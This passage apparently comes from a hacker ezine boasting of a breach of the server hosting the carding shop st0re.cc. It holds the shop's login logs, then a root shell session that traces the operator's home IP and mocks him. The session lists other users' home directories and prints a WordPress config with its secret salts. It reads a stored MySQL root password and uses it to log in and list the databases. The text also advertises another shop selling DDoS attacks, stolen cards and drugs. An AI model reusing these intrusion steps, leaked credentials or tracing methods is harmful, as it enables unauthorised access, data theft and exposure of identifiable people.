httpd_20110930_a.log:st0re.cc 2.200.120.131 2 30.09.11 09:56:50 "POST /login_do.php HTTP/1.0" 8549 669 323 httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 10:47:44 "POST /login_do.php HTTP/1.0" 8941 583 323 httpd_20110930_a.log:st0re.cc 95.211.13.145 2 30.09.11 10:50:13 "POST /login_do.php HTTP/1.0" 8095 635 323 httpd_20110930_a.log:st0re.cc 80.226.24.8 2 30.09.11 11:18:30 "POST /login_do.php HTTP/1.0" 8314 670 323 httpd_20110930_a.log:st0re.cc 79.253.2.25 2 30.09.11 11:27:54 "POST /login_do.php HTTP/1.0" 8574 720 323 httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 11:32:49 "POST /login_do.php HTTP/1.0" 8150 583 323 httpd_20110930_a.log:st0re.cc 77.176.68.228 2 30.09.11 13:01:42 "POST /login_do.php HTTP/1.0" 8211 641 3411 httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 13:19:38 "POST /login_do.php HTTP/1.0" 8286 583 323 httpd_20110930_a.log:st0re.cc 188.136.8.225 2 30.09.11 13:56:34 "POST /login_do.php HTTP/1.0" 8711 642 323 httpd_20110930_a.log:st0re.cc 92.241.168.24 2 30.09.11 14:31:08 "POST /login_do.php HTTP/1.0" 8377 630 323 httpd_20110930_a.log:st0re.cc 84.140.101.35 2 30.09.11 14:51:37 "POST /login_do.php HTTP/1.0" 8876 723 323 httpd_20110930_a.log:st0re.cc 93.192.34.166 2 30.09.11 15:34:17 "POST /login_do.php HTTP/1.0" 9479 788 341 httpd_20110930_a.log:st0re.cc 92.201.119.237 2 30.09.11 15:45:12 "POST /login_do.php HTTP/1.0" 8372 641 323 httpd_20110930_a.log:st0re.cc 87.122.41.84 2 30.09.11 15:57:19 "POST /login_do.php HTTP/1.0" 8163 633 323 httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 16:04:08 "POST /login_do.php HTTP/1.0" 8246 583 323 httpd_20110930_a.log:st0re.cc 88.72.19.192 2 30.09.11 16:15:47 "POST /login_do.php HTTP/1.0" 8768 630 323 httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 16:22:46 "POST /login_do.php HTTP/1.0" 8777 705 341 httpd_20110930_a.log:st0re.cc 77.10.175.234 2 30.09.11 16:24:21 "POST /login_do.php HTTP/1.0" 272729 732 323 httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 16:26:26 "POST /login_do.php HTTP/1.0" 8575 723 323 httpd_20110930_a.log:st0re.cc 93.192.34.166 2 30.09.11 16:30:04 "POST /login_do.php HTTP/1.0" 8150 787 323 httpd_20110930_a.log:st0re.cc 178.202.68.98 2 30.09.11 16:30:24 "POST /login_do.php HTTP/1.0" 8242 636 323 httpd_20110930_a.log:st0re.cc 178.7.135.0 2 30.09.11 16:33:20 "POST /login_do.php HTTP/1.0" 8378 648 323 httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 16:43:58 "POST /login_do.php HTTP/1.0" 8185 583 323 httpd_20110930_a.log:st0re.cc 92.241.164.197 2 30.09.11 16:44:05 "POST /login_do.php HTTP/1.0" 8263 654 323 httpd_20110930_a.log:st0re.cc 77.10.175.234 2 30.09.11 16:48:12 "POST /login_do.php HTTP/1.0" 8888 761 323 httpd_20110930_a.log:st0re.cc 46.115.16.29 2 30.09.11 16:55:14 "POST /login_do.php HTTP/1.0" 8958 718 323 httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 16:55:44 "POST /login_do.php HTTP/1.0" 8141 723 323 httpd_20110930_a.log:st0re.cc 88.76.37.149 2 30.09.11 16:59:33 "POST /login_do.php HTTP/1.0" 8468 643 323 httpd_20110930_a.log:st0re.cc 77.186.7.122 2 30.09.11 17:05:15 "POST /login_do.php HTTP/1.0" 8506 632 323 httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:05:35 "POST /login_do.php HTTP/1.0" 8739 583 323 httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 17:06:11 "POST /login_do.php HTTP/1.0" 8214 732 323 httpd_20110930_a.log:st0re.cc 91.53.197.228 2 30.09.11 17:07:00 "POST /login_do.php HTTP/1.0" 8094 787 323 httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:09:32 "POST /login_do.php HTTP/1.0" 8230 583 323 httpd_20110930_a.log:st0re.cc 178.3.99.162 2 30.09.11 17:12:29 "POST /login_do.php HTTP/1.0" 8606 640 323 httpd_20110930_a.log:st0re.cc 87.122.41.84 2 30.09.11 17:15:16 "POST /login_do.php HTTP/1.0" 8181 633 323 httpd_20110930_a.log:st0re.cc 84.177.153.224 2 30.09.11 17:17:27 "POST /login_do.php HTTP/1.0" 8550 650 323 httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:23:17 "POST /login_do.php HTTP/1.0" 8164 583 323 httpd_20110930_a.log:st0re.cc 92.224.62.134 2 30.09.11 17:25:51 "POST /login_do.php HTTP/1.0" 8164 642 323 httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:50:25 "POST /login_do.php HTTP/1.0" 8288 583 323 httpd_20110930_a.log:st0re.cc 178.162.135.66 2 30.09.11 17:56:45 "POST /login_do.php HTTP/1.0" 8871 612 323 httpd_20110930_a.log:st0re.cc 77.8.111.185 2 30.09.11 18:00:22 "POST /login_do.php HTTP/1.0" 8204 635 323 httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 18:06:05 "POST /login_do.php HTTP/1.0" 8037 583 323 httpd_20110930_a.log:st0re.cc 178.86.4.72 2 30.09.11 18:09:59 "POST /login_do.php HTTP/1.0" 8348 640 323 httpd_20110930_a.log:st0re.cc 87.156.226.177 2 30.09.11 18:15:41 "POST /login_do.php HTTP/1.0" 8184 650 323 httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 18:32:35 "POST /login_do.php HTTP/1.0" 13208 583 323 httpd_20110930_a.log:st0re.cc 62.177.139.171 2 30.09.11 18:43:36 "POST /login_do.php HTTP/1.0" 8538 612 323 httpd_20110930_a.log:st0re.cc 188.99.237.187 2 30.09.11 18:44:23 "POST /login_do.php HTTP/1.0" 8195 631 323 httpd_20110930_a.log:st0re.cc 84.144.24.26 2 30.09.11 18:46:44 "POST /login_do.php HTTP/1.0" 8378 733 323 httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 18:58:16 "POST /login_do.php HTTP/1.0" 8107 583 323 httpd_20110930_a.log:st0re.cc 88.128.93.67 2 30.09.11 19:14:31 "POST /login_do.php HTTP/1.0" 8347 741 323 httpd_20110930_a.log:st0re.cc 84.159.35.59 2 30.09.11 19:28:20 "POST /login_do.php HTTP/1.0" 8304 644 323 httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 19:35:08 "POST /login_do.php HTTP/1.0" 8222 732 323 httpd_20110930_a.log:st0re.cc 95.118.133.136 2 30.09.11 19:43:28 "POST /login_do.php HTTP/1.0" 8076 641 323 httpd_20110930_a.log:st0re.cc 77.183.29.40 2 30.09.11 19:45:35 "POST /login_do.php HTTP/1.0" 8195 639 323 httpd_20110930_a.log:st0re.cc 213.135.18.45 2 30.09.11 19:49:23 "POST /login_do.php HTTP/1.0" 8152 581 323 httpd_20110930_a.log:st0re.cc 87.156.29.114 2 30.09.11 19:52:03 "POST /login_do.php HTTP/1.0" 8481 723 323 httpd_20110930_a.log:st0re.cc 217.231.145.151 2 30.09.11 20:08:21 "POST /login_do.php HTTP/1.0" 8568 794 341 httpd_20110930_a.log:st0re.cc 217.231.145.151 2 30.09.11 20:08:34 "POST /login_do.php HTTP/1.0" 9612 793 323 httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 20:10:43 "POST /login_do.php HTTP/1.0" 8277 723 323 httpd_20110930_a.log:st0re.cc 213.135.18.45 2 30.09.11 20:14:09 "POST /login_do.php HTTP/1.0" 8427 581 323 httpd_20110930_a.log:st0re.cc 92.225.99.187 2 30.09.11 20:15:41 "POST /login_do.php HTTP/1.0" 8416 625 341 httpd_20110930_a.log:st0re.cc 92.225.99.187 2 30.09.11 20:16:47 "POST /login_do.php HTTP/1.0" 8292 641 323 httpd_20110930_a.log:st0re.cc 213.163.65.50 2 30.09.11 20:19:02 "POST /login_do.php HTTP/1.0" 8270 629 323 httpd_20110930_a.log:st0re.cc 84.166.216.59 2 30.09.11 20:36:40 "POST /login_do.php HTTP/1.0" 8410 721 323 httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 20:51:21 "POST /login_do.php HTTP/1.0" 8349 732 323 httpd_20110930_a.log:st0re.cc 213.135.18.45 2 30.09.11 20:54:58 "POST /login_do.php HTTP/1.0" 8343 581 323 httpd_20110930_a.log:st0re.cc 95.118.133.136 2 30.09.11 20:56:17 "POST /login_do.php HTTP/1.0" 8158 641 323 httpd_20110930_a.log:st0re.cc 95.118.133.136 2 30.09.11 21:14:05 "POST /login_do.php HTTP/1.0" 8708 641 323 httpd_20110930_a.log:st0re.cc 84.189.234.204 2 30.09.11 21:17:37 "POST /login_do.php HTTP/1.0" 8194 671 323 httpd_20110930_a.log:st0re.cc 87.139.98.60 2 30.09.11 21:23:18 "POST /login_do.php HTTP/1.0" 8082 644 323 httpd_20110930_a.log:st0re.cc 109.236.86.130 2 30.09.11 21:35:53 "POST /login_do.php HTTP/1.0" 8154 645 323 httpd_20110930_a.log:st0re.cc 93.186.200.12 2 30.09.11 21:45:37 "POST /login_do.php HTTP/1.0" 8409 627 341 httpd_20110930_a.log:st0re.cc 77.183.29.40 2 30.09.11 21:46:22 "POST /login_do.php HTTP/1.0" 8157 639 323 httpd_20110930_a.log:st0re.cc 62.141.36.190 2 30.09.11 21:50:30 "POST /login_do.php HTTP/1.0" 8119 622 341 httpd_20110930_a.log:st0re.cc 62.141.36.190 2 30.09.11 21:50:37 "POST /login_do.php HTTP/1.0" 8241 622 323 httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 21:53:11 "POST /login_do.php HTTP/1.0" 8070 723 323 httpd_20110930_a.log:st0re.cc 178.202.68.98 2 30.09.11 21:53:33 "POST /login_do.php HTTP/1.0" 8254 636 323 httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 22:07:29 "POST /login_do.php HTTP/1.0" 8648 732 323 httpd_20110930_a.log:st0re.cc 89.15.88.227 2 30.09.11 22:19:27 "POST /login_do.php HTTP/1.0" 8205 635 341 httpd_20110930_a.log:st0re.cc 80.239.242.78 2 30.09.11 22:21:00 "POST /login_do.php HTTP/1.0" 8402 646 323 httpd_20110930_a.log:st0re.cc 91.10.251.46 2 30.09.11 22:31:06 "POST /login_do.php HTTP/1.0" 8479 721 341 httpd_20110930_a.log:st0re.cc 91.10.251.46 2 30.09.11 22:33:29 "POST /login_do.php HTTP/1.0" 8240 720 323 httpd_20110930_a.log:st0re.cc 178.202.68.98 2 30.09.11 22:33:49 "POST /login_do.php HTTP/1.0" 14741 636 323 httpd_20110930_a.log:st0re.cc 77.24.94.72 2 30.09.11 22:34:14 "POST /login_do.php HTTP/1.0" 8203 663 341 httpd_20110930_a.log:st0re.cc 82.195.234.50 2 30.09.11 22:36:30 "POST /login_do.php HTTP/1.0" 8304 729 341 httpd_20110930_a.log:st0re.cc 82.195.234.50 2 30.09.11 22:36:38 "POST /login_do.php HTTP/1.0" 8228 730 323 httpd_20110930_a.log:st0re.cc 178.3.99.162 2 30.09.11 22:42:38 "POST /login_do.php HTTP/1.0" 8094 640 323 httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 23:08:46 "POST /login_do.php HTTP/1.0" 8207 732 323 httpd_20110930_a.log:st0re.cc 89.204.153.246 2 30.09.11 23:10:14 "POST /login_do.php HTTP/1.0" 8285 696 323 httpd_20110930_a.log:st0re.cc 79.192.107.57 2 30.09.11 23:20:54 "POST /login_do.php HTTP/1.0" 8307 639 323 httpd_20110930_a.log:st0re.cc 93.196.21.139 2 30.09.11 23:29:34 "POST /login_do.php HTTP/1.0" 8856 633 323 httpd_20110930_a.log:st0re.cc 2.213.95.13 2 30.09.11 23:50:22 "POST /login_do.php HTTP/1.0" 8379 633 323 httpd_20110930_a.log:st0re.cc 82.83.112.126 2 30.09.11 23:56:18 "POST /login_do.php HTTP/1.0" 8721 744 323 httpd_20110930_a.log:st0re.cc 77.20.159.112 2 01.10.11 00:20:55 "POST /login_do.php HTTP/1.0" 8354 643 323 httpd_20110930_a.log:st0re.cc 178.9.168.231 2 01.10.11 01:13:45 "POST /login_do.php HTTP/1.0" 9722 729 341 httpd_20110930_a.log:st0re.cc 84.59.159.134 2 01.10.11 01:35:23 "POST /login_do.php HTTP/1.0" 8207 646 323 httpd_20110930_a.log:st0re.cc 87.139.98.60 2 01.10.11 01:48:07 "POST /login_do.php HTTP/1.0" 9020 644 323 httpd_20110930_a.log:st0re.cc 92.224.0.114 2 01.10.11 01:56:01 "POST /login_do.php HTTP/1.0" 8930 640 341 httpd_20110930_a.log:st0re.cc 92.224.0.114 2 01.10.11 01:58:53 "POST /login_do.php HTTP/1.0" 8227 648 341 httpd_20110930_a.log:st0re.cc 195.71.18.209 2 01.10.11 02:40:09 "POST /login_do.php HTTP/1.0" 8594 630 323 httpd_20110930_a.log:st0re.cc 95.118.98.231 2 01.10.11 02:47:35 "POST /login_do.php HTTP/1.0" 8143 735 341 httpd_20110930_a.log:st0re.cc 95.222.50.203 2 01.10.11 03:00:42 "POST /login_do.php HTTP/1.0" 8455 637 323 httpd_access.log:st0re.cc 79.247.250.2 2 01.10.11 03:25:18 "POST /login_do.php HTTP/1.0" 8322 648 341 httpd_access.log:st0re.cc 79.247.250.2 2 01.10.11 03:25:30 "POST /login_do.php HTTP/1.0" 1543 648 341 httpd_access.log:st0re.cc 84.189.234.204 2 01.10.11 03:56:19 "POST /login_do.php HTTP/1.0" 8108 671 323 httpd_access.log:st0re.cc 46.115.17.43 2 01.10.11 04:19:31 "POST /login_do.php HTTP/1.0" 8725 629 341 httpd_access.log:st0re.cc 46.115.17.43 2 01.10.11 04:19:57 "POST /login_do.php HTTP/1.0" 8745 627 323 httpd_access.log:st0re.cc 84.74.179.83 2 01.10.11 05:17:41 "POST /login_do.php HTTP/1.0" 8227 724 323 httpd_access.log:st0re.cc 66.176.9.110 2 01.10.11 06:22:46 "POST /login_do.php HTTP/1.0" 8182 889 323 httpd_access.log:st0re.cc 84.171.65.229 2 01.10.11 11:16:40 "POST /login_do.php HTTP/1.0" 10603 646 323 httpd_access.log:st0re.cc 213.135.18.45 2 01.10.11 11:32:59 "POST /login_do.php HTTP/1.0" 8670 581 323 httpd_access.log:st0re.cc 92.224.58.242 2 01.10.11 11:59:27 "POST /login_do.php HTTP/1.0" 8330 633 323 httpd_access.log:st0re.cc 115.184.3.252 2 01.10.11 12:12:22 "POST /login_do.php HTTP/1.0" 8176 699 323 httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 12:41:47 "POST /login_do.php HTTP/1.0" 8422 787 323 httpd_access.log:st0re.cc 89.0.20.128 2 01.10.11 13:00:16 "POST /login_do.php HTTP/1.0" 8213 647 323 httpd_access.log:st0re.cc 85.17.97.27 2 01.10.11 13:31:59 "POST /login_do.php HTTP/1.0" 8667 634 341 httpd_access.log:st0re.cc 212.150.184.230 2 01.10.11 13:37:20 "POST /login_do.php HTTP/1.0" 8082 652 323 httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 13:48:36 "POST /login_do.php HTTP/1.0" 8041 787 323 httpd_access.log:st0re.cc 80.142.41.35 2 01.10.11 13:56:41 "POST /login_do.php HTTP/1.0" 8142 675 323 httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 13:58:43 "POST /login_do.php HTTP/1.0" 1754 787 323 httpd_access.log:st0re.cc 92.226.41.234 2 01.10.11 14:09:46 "POST /login_do.php HTTP/1.0" 8161 636 341 httpd_access.log:st0re.cc 178.202.68.98 2 01.10.11 14:09:49 "POST /login_do.php HTTP/1.0" 8236 636 323 httpd_access.log:st0re.cc 92.226.41.234 2 01.10.11 14:09:52 "POST /login_do.php HTTP/1.0" 8429 644 323 httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 14:30:23 "POST /login_do.php HTTP/1.0" 8060 794 341 httpd_access.log:st0re.cc 87.122.41.84 2 01.10.11 14:42:56 "POST /login_do.php HTTP/1.0" 8176 633 323 httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 14:45:00 "POST /login_do.php HTTP/1.0" 1750 787 323 httpd_access.log:st0re.cc 92.224.11.28 2 01.10.11 15:03:01 "POST /login_do.php HTTP/1.0" 8030 664 341 httpd_access.log:st0re.cc 88.74.202.98 2 01.10.11 15:45:47 "POST /login_do.php HTTP/1.0" 8167 661 323 httpd_access.log:st0re.cc 95.118.133.136 2 01.10.11 15:50:25 "POST /login_do.php HTTP/1.0" 8025 641 323 httpd_access.log:st0re.cc 217.79.178.233 2 01.10.11 15:52:07 "POST /login_do.php HTTP/1.0" 8115 726 323 httpd_access.log:st0re.cc 77.188.205.152 2 01.10.11 15:56:27 "POST /login_do.php HTTP/1.0" 8137 643 323 httpd_access.log:st0re.cc 87.122.34.237 2 01.10.11 15:58:01 "POST /login_do.php HTTP/1.0" 8125 635 323 httpd_access.log:st0re.cc 212.117.165.197 2 01.10.11 16:25:15 "POST /login_do.php HTTP/1.0" 8005 646 323 httpd_access.log:st0re.cc 46.20.44.58 2 01.10.11 16:26:19 "POST /login_do.php HTTP/1.0" 7911 638 341 httpd_access.log:st0re.cc 93.223.63.24 2 01.10.11 16:39:27 "POST /login_do.php HTTP/1.0" 8066 631 323 httpd_access.log:st0re.cc 77.20.159.112 2 01.10.11 16:47:10 "POST /login_do.php HTTP/1.0" 8025 643 323 httpd_access.log:st0re.cc 109.236.86.130 2 01.10.11 16:59:19 "POST /login_do.php HTTP/1.0" 1524 719 323 httpd_access.log:st0re.cc 88.69.129.69 2 01.10.11 17:01:04 "POST /login_do.php HTTP/1.0" 8045 721 323 httpd_access.log:st0re.cc 62.141.46.134 2 01.10.11 17:06:19 "POST /login_do.php HTTP/1.0" 8112 645 323 httpd_access.log:st0re.cc 93.133.47.182 2 01.10.11 17:14:46 "POST /login_do.php HTTP/1.0" 8307 622 341 # And who is the guy behind that crap?^C # last | grep mmgen mmgen ftp 212.150.184.230 Mon Oct 3 16:58 - 16:59 (00:01) mmgen ftp 212.150.184.230 Mon Oct 3 16:57 - 16:58 (00:01) mmgen ftp 212.150.184.230 Mon Oct 3 16:43 - 16:44 (00:01) mmgen ftp 212.150.184.230 Mon Oct 3 16:10 - 16:11 (00:01) mmgen ftp 212.150.184.230 Mon Oct 3 16:10 - 16:13 (00:03) mmgen ftp 212.150.184.230 Mon Oct 3 16:04 - 16:05 (00:01) mmgen ftp 212.150.184.230 Mon Oct 3 15:54 - 16:00 (00:05) mmgen ftp 212.150.184.230 Mon Oct 3 15:54 - 15:54 (00:00) mmgen ftp 212.150.184.230 Mon Oct 3 15:54 - 15:57 (00:03) # Israel does not look that interesting...^C # grep mgen.*78 /var/log/proftpd-transfer.log Sun Dec 19 14:56:29 2010 0 92.241.164.197 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180253783625111 b _ d r mmgen ftp 0 * c Fri Jan 14 23:16:40 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180257808454951 a _ d r mmgen ftp 0 * c Sun Jan 23 16:36:30 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180256065317802 a _ d r mmgen ftp 0 * c Thu Jan 27 23:14:04 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250537839337 a _ o r mmgen ftp 0 * c Thu Jan 27 23:14:07 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250621167843 a _ o r mmgen ftp 0 * c Thu Jan 27 23:17:39 2011 0 78.42.186.98 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250537839337 a _ d r mmgen ftp 0 * c Thu Jan 27 23:17:39 2011 0 78.42.186.98 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250621167843 a _ d r mmgen ftp 0 * c 78.42.186.98 resolves to Kabel Baden-Wuerttemberg GmbH & Co. KG, Muellheim in Germany. Looks like someone did not constantly use a proxy. Means you are officially . / \ | | |.| PWNED LOL! |.| / |:| __ / ,_|:|_, / ) (Oo / _I_ +\ \ || __| \ \||___| \ /.:.\-\ |.:. /-----\ |___|::pwn::| / |:<_T_>:| |_____\ ::: / | | \ \:/ | | | | \ / | \___ / | \_____\ Alright people let's keep the show going with El-Basar.biz ... ,;~;, /\_ ( / (() //) | \\ ,,;;'\ __ _( )m=((((((((((((((========{ El-Basar.biz }=======------- /' ' '()/~' '.(, | ,;( )|| | ~ Searching for "El-Bazar.biz" on google gives a ,;' \ /-(.;, ) good impression of what's being sold there. You ) / ) / can buy one week of DDOS to take down one web- // || site for 250 Euros. You get 10 US CCs without )_\ )_\ DOB (date of birth) for 5 Euros. And you can even buy 50g of MDMA crystals for 2000 Euros. Hilarious! El-Basar is being run by some guy called Ganymedes and was hosted on the same server as St0re.cc. However it seems like Ganymedes has moved his shop to another location which sadly has not been backdoored by us so far and thus will not make it into this issue of our ezine. Notwithstanding he left enough data on his old box, but we must say, Ganymedes, if you don't take down your store, we will be so kind and do that for you sooner or later. Thanks. # pwd /home # ls -la total 116 drwx--x--x 28 root wheel 1024 Sep 14 17:31 . drwx--x--x 18 root wheel 512 Apr 12 19:59 .. drwxrwx--- 13 alg www 1024 Feb 19 2011 alg drwxr-x--- 4 ayoga www 512 Apr 23 2009 ayoga drwxr-x--- 5 crank2010 www 512 Dec 27 2009 crank2010 drwxr-x--- 4 exchanger www 512 Mar 31 2010 exchanger drwxr-x--- 6 filip www 512 Jul 16 2010 filip drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 ganymedes drwxr-x--- 6 garf www 512 Apr 16 02:26 garf drwxr-x--- 4 lordknight www 512 Jan 3 2010 lordknight drwxr-x--- 4 madrage www 512 Jan 10 2010 madrage drwxrwxr-x 5 margosha www 512 Sep 8 16:22 margosha drwxr-x--- 7 mmgen www 512 Jun 11 13:18 mmgen drwxr-x--- 9 mr101 www 512 Apr 7 2010 mr101 drwxr-x--- 4 msk www 512 May 20 2009 msk drwxr-x--- 4 muraaat www 512 Aug 29 20:59 muraaat drwxr-x--- 7 nukeuploads www 512 Dec 2 2009 nukeuploads drwxr-x--- 8 onlineschauen www 512 Oct 1 23:57 onlineschauen drwxr-x--- 4 pavlrse www 512 Aug 21 03:32 pavlrse drwxr-x--- 8 propiska www 512 Nov 19 2010 propiska drwxr-x--- 5 scenehack www 512 Feb 22 2010 scenehack drwxr-x--- 4 snetwork www 512 Jul 14 22:01 snetwork drwxr-x--- 5 szenevz www 512 Mar 11 2010 szenevz drwxr-x--- 2 test4me www 512 Sep 2 01:39 test4me drwxr-x--- 4 thefuelru www 512 Jan 22 2010 thefuelru drwxr-x--- 4 useresu www 512 Aug 19 11:27 useresu drwxr-x--- 4 useresu1 www 3584 Aug 19 11:47 useresu1 drwxrwxr-x 6 vestacomp www 512 Dec 20 2010 vestacomp # cd ganymedes # ls -la total 1180 drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 . drwx--x--x 28 root wheel 1024 Sep 14 17:31 .. -rw------- 1 root www 520192 Oct 5 21:43 bash.core drwxrwx--- 3 ganymedes www 512 Sep 26 22:54 el-basar.biz drwxrwx--- 6 ganymedes www 1024 Sep 28 23:58 newsportal24.net drwxrwx--- 2 ganymedes www 53760 Oct 6 00:38 temp # cd newsportal24.net # ls -la total 388 drwxrwx--- 6 ganymedes www 1024 Sep 28 23:58 . drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 .. -rw-r--r-- 1 ganymedes www 397 Sep 27 18:24 index.php -rw-r--r-- 1 ganymedes www 16572 Sep 27 18:24 license.txt drwxr-xr-x 2 ganymedes www 512 Sep 29 00:50 test -rw-r--r-- 1 ganymedes www 4343 Sep 27 18:24 wp-activate.php drwxr-xr-x 9 ganymedes www 2560 Sep 27 18:25 wp-admin -rw-r--r-- 1 ganymedes www 40243 Sep 27 18:24 wp-app.php -rw-r--r-- 1 ganymedes www 226 Sep 27 18:24 wp-atom.php -rw-r--r-- 1 ganymedes www 274 Sep 27 18:24 wp-blog-header.php -rw-r--r-- 1 ganymedes www 3931 Sep 27 18:24 wp-comments-post.php -rw-r--r-- 1 ganymedes www 244 Sep 27 18:24 wp-commentsrss2.php -rw-r--r-- 1 ganymedes www 3577 Sep 27 18:24 wp-config-sample.php -rw-rw-rw- 1 www www 3896 Sep 27 18:33 wp-config.php drwxr-xr-x 6 ganymedes www 512 Sep 27 18:40 wp-content -rw-r--r-- 1 ganymedes www 1255 Sep 27 18:24 wp-cron.php -rw-r--r-- 1 ganymedes www 246 Sep 27 18:24 wp-feed.php drwxr-xr-x 8 ganymedes www 2560 Sep 27 18:26 wp-includes -rw-r--r-- 1 ganymedes www 1997 Sep 27 18:24 wp-links-opml.php -rw-r--r-- 1 ganymedes www 2618 Sep 27 18:24 wp-load.php -rw-r--r-- 1 ganymedes www 27601 Sep 27 18:24 wp-login.php -rw-r--r-- 1 ganymedes www 7774 Sep 27 18:24 wp-mail.php -rw-r--r-- 1 ganymedes www 494 Sep 27 18:24 wp-pass.php -rw-r--r-- 1 ganymedes www 224 Sep 27 18:24 wp-rdf.php -rw-r--r-- 1 ganymedes www 334 Sep 27 18:24 wp-register.php -rw-r--r-- 1 ganymedes www 224 Sep 27 18:24 wp-rss.php -rw-r--r-- 1 ganymedes www 226 Sep 27 18:24 wp-rss2.php -rw-r--r-- 1 ganymedes www 9839 Sep 27 18:24 wp-settings.php -rw-r--r-- 1 ganymedes www 18646 Sep 27 18:24 wp-signup.php -rw-r--r-- 1 ganymedes www 3702 Sep 27 18:24 wp-trackback.php -rw-r--r-- 1 ganymedes www 3266 Sep 27 18:24 xmlrpc.php # cat wp-config.php _irty|#bG+hp@Qj6%qo.-N d.ZnGC=f@`m'); define('AUTH_SALT', 'T|#(IjI)JW%66G(e2S}$k-8/QY.iEfl^/v}PWgtk$@cnw9d)N pAm4A,A.~f+x_Hc}V^Wi${iO%`$FJb8%~W?$|*l{%$+cK2.{A*ZNW>)~Ht0r,p B[3('); define('LOGGED_IN_SALT', 'n[Un&54kqxFw|!d]ccfCV5ajNklT`YN/YECk (K2}T{;,0,*!|)ru}/ysPG s$v-'); define('NONCE_SALT', 'cm$vLkM34?(0u}&O)SOp>qCRZq*LJY``ym%-tNFg+MQ^#L{x~@c,d@fCJ27{;d~8'); /**#@-*/ /** * WordPress Datenbanktabellen-Präfix * * Wenn du verschiedene Präfixe benutzt, kannst du innerhalb einer Datenbank * verschiedene WordPress-Installationen betreiben. Nur Zahlen, Buchstaben und Unterstriche bitte! */ $table_prefix = 'wp_news'; /** * WordPress Sprachdatei * * Hier kannst du einstellen, welche Sprachdatei benutzt werden soll. Die entsprechende * Sprachdatei muss im Ordner wp-content/languages vorhanden sein, beispielsweise de_DE.mo * Wenn du nichts einträgst, wird Englisch genommen. */ define('WPLANG', 'de_DE'); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. */ define('WP_DEBUG', false); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php'); # cd .. # cd el-basar.biz # ls -laR total 12 drwxrwx--- 3 ganymedes www 512 Sep 26 22:54 . drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 .. drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 85c91o822x3olps1d8179xizbm27 ./85c91o822x3olps1d8179xizbm27: total 12 drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 . drwxrwx--- 3 ganymedes www 512 Sep 26 22:54 .. drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 check ./85c91o822x3olps1d8179xizbm27/check: total 20 drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 . drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 .. drwxrwxrwx 2 ganymedes www 6144 Sep 17 13:01 vp2q910pxc2ifo091y ./85c91o822x3olps1d8179xizbm27/check/vp2q910pxc2ifo091y: total 16 drwxrwxrwx 2 ganymedes www 6144 Sep 17 13:01 . drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 .. -rw-r--r-- 1 www www 0 Aug 11 01:55 6337180250025522924 -rw-r--r-- 1 www www 0 Aug 9 19:04 6337180250037669499 ... # Nothing left here anymore :(^C # Better check the database ... # cat /etc/my.passwd bde413a2c8751ac97887f11d6efb2c39 # mysql -u root -pbde413a2c8751ac97887f11d6efb2c39 Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 205220 Server version: 5.0.51a-log FreeBSD port: mysql-server-5.0.51a Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> SHOW DATABASES; +--------------------+ | Database | +--------------------+ | information_schema | | alg_forum | | alg_hide | | alg_zzz | | crank2010_forum | | crimecore_board | | exchanger_db | | filip_eldent | | filip_eldent_ | | ganymedes_bosscc | | ganymedes_bossm | | garf_ban | | hcgcrew?forum | | jeka-test_ | | lordknight_forum | | lordknight_teon | | madrage_wbb | | margosha_forum | | margosha_sait | | mmgen_3 | | mmgen_ref | | mmgen_shop | | mr101_old | | mr101_w3 | | muraaat_mybb | | mysql | | 